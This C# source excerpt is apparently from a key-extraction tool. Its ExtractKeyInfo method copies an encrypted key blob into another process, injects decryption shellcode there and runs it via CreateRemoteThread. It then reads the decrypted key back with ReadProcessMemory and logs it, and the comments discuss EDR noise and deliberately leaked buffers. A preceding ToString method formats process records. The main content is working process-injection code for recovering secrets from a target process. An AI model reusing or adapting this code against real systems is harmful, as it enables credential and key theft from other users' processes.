/// <summary>
/// One-line, pipe-delimited summary of this process record, in the fixed field order
/// ProcessName, PID, UserName, CPUTime, NumBytes, HandleCount, ThreadCount, CommandLineArgs.
/// A null field renders as an empty string (string.Format semantics, the same as the
/// "+" concatenation this replaces). The separator is not escaped, so a CommandLineArgs
/// value that itself contains '|' cannot be split back unambiguously by a consumer.
/// </summary>
public override string ToString()
{
    return string.Format("{0}|{1}|{2}|{3}|{4}|{5}|{6}|{7}",
        ProcessName, PID, UserName, CPUTime, NumBytes, HandleCount, ThreadCount, CommandLineArgs);
}
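/// <summary>
/// Reports one recovered key. With <paramref name="DecryptKeys"/> false the key is logged as-is
/// (encrypted blob only). Otherwise the encrypted blob is copied into the target process, the
/// decryption stub produced by <c>GenerateDecryptionShellCode</c> is written there and run on a
/// remote thread, and the bytes at the blob's address are read back as the plaintext and logged.
/// </summary>
/// <param name="key">Key record whose <c>encryptedBlob</c> is decrypted; <c>plaintextBlob</c> is set on success.</param>
/// <param name="ProcessHandle">Handle to the target process. The remote steps need memory write/read and thread-creation rights on it; otherwise they fail and an error is logged.</param>
/// <param name="DecryptKeys">False: log the encrypted key only. True: perform the in-target decryption described above.</param>
/// <remarks>
/// This injects code into and runs a thread inside another process, so it is noisy to EDR
/// (remote allocation + write + CreateRemoteThread). The remote buffers are deliberately not freed
/// (see the note at the end), and the thread handle from CreateRemoteThread is not closed here
/// because no CloseHandle wrapper is in scope — calling this in a loop leaks one handle per key.
/// The plaintext also remains resident in the target process at the blob address.
/// </remarks>
public static void ExtractKeyInfo(IUserKey key, IntPtr ProcessHandle, bool DecryptKeys)
{
    if (!DecryptKeys)
    {
        Logger.WriteLine(key);
        return;
    }

    // Nothing to decrypt: without this guard the Length access below throws a NullReferenceException.
    if (key == null || key.encryptedBlob == null || key.encryptedBlob.Length == 0)
    {
        Logger.WriteLine("Error: key has no encrypted blob to decrypt");
        return;
    }

    int blobLength = key.encryptedBlob.Length;

    // Stage the ciphertext in the target; the stub decrypts it in place at this address.
    // Assumes AllocateRemoteBuffer returns IntPtr.Zero on failure — if it throws instead, this
    // check is simply never taken. Without it a failed allocation would inject a stub that
    // targets address 0 and then start a thread at address 0.
    IntPtr remoteBlob = Win32.AllocateRemoteBuffer(ProcessHandle, key.encryptedBlob);
    if (remoteBlob == IntPtr.Zero)
    {
        Logger.WriteLine("Error: Could not allocate the encrypted blob in the target process");
        return;
    }

    byte[] stub = GenerateDecryptionShellCode(remoteBlob, blobLength);
    IntPtr remoteStub = Win32.AllocateRemoteBuffer(ProcessHandle, stub);
    if (remoteStub == IntPtr.Zero)
    {
        Logger.WriteLine("Error: Could not allocate the shellcode in the target process");
        return;
    }

    // Run the stub on a fresh thread inside the target.
    IntPtr threadId = IntPtr.Zero;
    IntPtr remoteThread = Win32.CreateRemoteThread(ProcessHandle, IntPtr.Zero, 0, remoteStub, IntPtr.Zero, 0, out threadId);
    if (remoteThread == IntPtr.Zero)
    {
        Logger.WriteLine("Error: Could not create a thread for the shellcode");
        return;
    }

    // No WaitForSingleObject wrapper is in scope, so completion is assumed after a fixed delay.
    // This is a race: on a slow or heavily loaded target the read below can return the
    // still-encrypted blob, which is then reported as plaintext. Waiting on remoteThread
    // (with a timeout) would be the correct synchronisation if a wrapper is added.
    Thread.Sleep(1000);

    // Read the decrypted bytes back from the same address the ciphertext was staged at.
    byte[] decrypted = new byte[blobLength];
    IntPtr bytesRead;
    int readOk = Win32.ReadProcessMemory(ProcessHandle, remoteBlob, decrypted, decrypted.Length, out bytesRead);
    if (readOk != 0 && bytesRead.ToInt64() == decrypted.Length)
    {
        key.plaintextBlob = decrypted;
        Logger.WriteLine(key);
    }
    else
    {
        // Previously a short or failed read was silently dropped; make it visible so a missing
        // key in the output can be told apart from a key that was never found.
        Logger.WriteLine("Error: Could not read the decrypted blob back from the target process");
    }

    // The remote buffers are leaked on purpose: freeing the shellcode page while its thread may
    // still be running crashed the target (original note: "VirtualFree was causing crashes").
    // Thread.Sleep(4000); // Wait for the shellcode to finish executing
    // Win32.VirtualFreeEx(ProcessHandle, remoteStub, 0, Win32.FreeType.Release);
}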